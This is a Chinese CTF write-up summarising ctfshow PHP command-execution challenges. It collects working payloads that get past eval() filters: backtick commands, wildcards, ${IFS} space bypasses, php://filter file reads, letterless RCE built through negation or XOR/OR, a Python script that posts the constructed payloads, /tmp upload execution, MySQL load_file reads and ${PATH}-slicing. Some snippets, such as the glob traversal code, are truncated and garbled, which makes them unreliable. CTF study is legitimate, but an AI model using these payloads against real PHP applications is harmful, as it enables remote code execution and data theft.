ctfshow命令执行刷题总结

过滤system函数和php

if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }

那还有其他函数可以使用，比如说

passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()

可以使用的payload有

c=echo `nl fl''ag.ph''p`;
c=echo `cat f*`;
c=echo `nl fla''g.p''hp`;
c=echo `nl fla?????`;

过滤了一些敏感命令

    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }

cat被过滤可以用其他的命令来代替，比如

more:一页一页的显示档案内容
less:与 more 类似 head:查看头几行
tac:从最后一行开始显示，可以看出 tac 是cat 的反向显示
tail:查看尾几行
nl：显示的时候，顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器，这个也可以查看
vim:一种编辑器，这个也可以查看
sort:可以查看
uniq:可以查看 file -f:报错出具体内容 grep

也有相关文件读取函数：

file_get_content()
readfile()
highlight_file()
show_source()

空格过滤绕过姿势：

%09（要有php环境）${IFS}   $IFS$9  <>  \x20

一个骚姿势:

c=eval($_GET[1]);&1=system('nl flag.php');

可以通吃好几关。

过滤了括号

include函数是不需要括号的。利用文件包含来读取flag。

c=include$_POST["a"]?>
a=php://filter/read=convert.base64-encode/resource=flag.php

分号可以用?>来代替，涉及到文件包含姿势也就更多了，大同小异。还可以通过nginx的日志来获取到shell。（日志文件包含）

过滤数字字母（无字母数字RCE）

取反（需要~符号）

举一个实例，构造一个system('ls')这个命令。

得到取反后的结果，因为可能会有不可见字符，所以 url编码一下。构造payload的时候再用~取反回来就行，（取反原理：PHP ~(按位取反)位运算符_Williamslife的博客-CSDN博客_php 按位取反）

异或（需要^符号）

相同数字为0，不同数字为1.比如1^1=0，1^0=0。在进行字符异或时，先转为二进制而进行异或。这样通过两个字符就可以异或为一个新的字符。直接上异或脚本。

import requests
import re

xiao1 = ""
xiao2 = ""
url = 'http://bb034458-7bb2-4376-9947-382f39e45cd1.challenge.ctf.show/'
cit = []         #收集没有被过滤的字符
for i in range(255):
    a = chr(i)
    wer = re.match(r'[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-', a, re.I)
    # print(wer)
    if (wer):
        continue
    else:
        cit.append(i)       #添加元素
pay1 = "system"  # 函数名，如system
pay2 = "cat flag.php"  # 参数，例如ls


def text(a, b):
    global xiao1
    global xiao2
    for i in range(0, len(cit)):
        for j in range(i, len(cit)):
            if cit[i] | cit[j] == ord(b[a]):    #找出哪两个字符异或得到目标字符
                xiao1 += chr(cit[i])   #添加
                xiao2 += chr(cit[j])   #添加
                return

for m in range(0,len(pay1)):  #遍历目标字符串
    text(m,pay1)
data1 = "(\"" + xiao1 + "\"|\"" + xiao2 + "\")"  #需要构造如(system)(ls)的形式所以要加大括号
xiao1 = ""
xiao2 = ""
for m in range(0,len(pay2)):
    text(m,pay2)
data2 = "(\"" + xiao1 + "\"|\"" +xiao2 + "\")"
data = {"c":data1 + data2}
res = requests.post(url=url, data=data).text#收到响应内容
print(res)

自增（需要+字符）

通过自增改变字符的ascli码值来获得新的字符。++'字符1'='字符二'。

骚姿势一（linux系统）

shell下是可以用点来执行任意脚本的，而且不需要执行权限。如果我们上传一个可控的文件，再用点来执行这个文件，对于陌生的上传文件，php会把它放在临时目录/tmp文件夹下，

post上传文件的数据包：

    
    
    




    文件名：
    

    

这种文件的保存路径在linux下一般为/tmp/php??????。在上传的文件中构造命令如下：

#!/bin/sh
ls

上传文件抓包，再传参，怎么传参执行文件呢？构造payload:

?c=.+/???/????????[@-[]

@字符和[字符是大写字母的边界。在这里来匹配大写字母。（相关知识链接：无字母数字webshell之提高篇，）（无字母数字的命令执行(ctfshow web入门 55）_Firebasky的博客-CSDN博客_无字符命令执行）

骚姿势二

利用$()数学运算。linux运行操作看一下。

$((~$(())))运算为-1，那么我们就可以构造任意数字了。麻烦死了。。

ob缓存

看题目代码：

if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

只需要exit强制退出即可。如payload:

c=require("/flag.txt");exit();

需要遍历

利用php内置类和glob协议来遍历目录找到flag。相关payload:

c=?>__toString().' ');
} 
exit(0);
?>

遍历脚本：

import requests
url='http://31f2752e-4051-467d-a2b9-8ab036691177.challenge.ctf.show/'
print(requests.post(url,data={'c':'''?>__toString().' ');} exit(0);?>'''}).text)
print(requests.post(url,{'c':f'''?>

利用mysql读取

需要知道数据库名。payload:

c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');foreach($dbh->query('select load_file("/flag36.txt")') as $row)
{echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e-
>getMessage();exit(0);}exit(0);

通过${PATH}等

可以通过${PATH}等环境变量来截取字符，拼接构造payload。

可以构造我们想要的命令。 除了PATH，还有PWD，HOME，等等。可以结合?通配符使用。

举个例子，构造nl flag.php，payload为

${PATH:14:1}${PATH:5:1} ????.???

参考链接:

可以参考mumuzi师傅的：ctfshow 命令执行 web29-web77 web118-122 web124 wp_是Mumuzi的博客-CSDN博客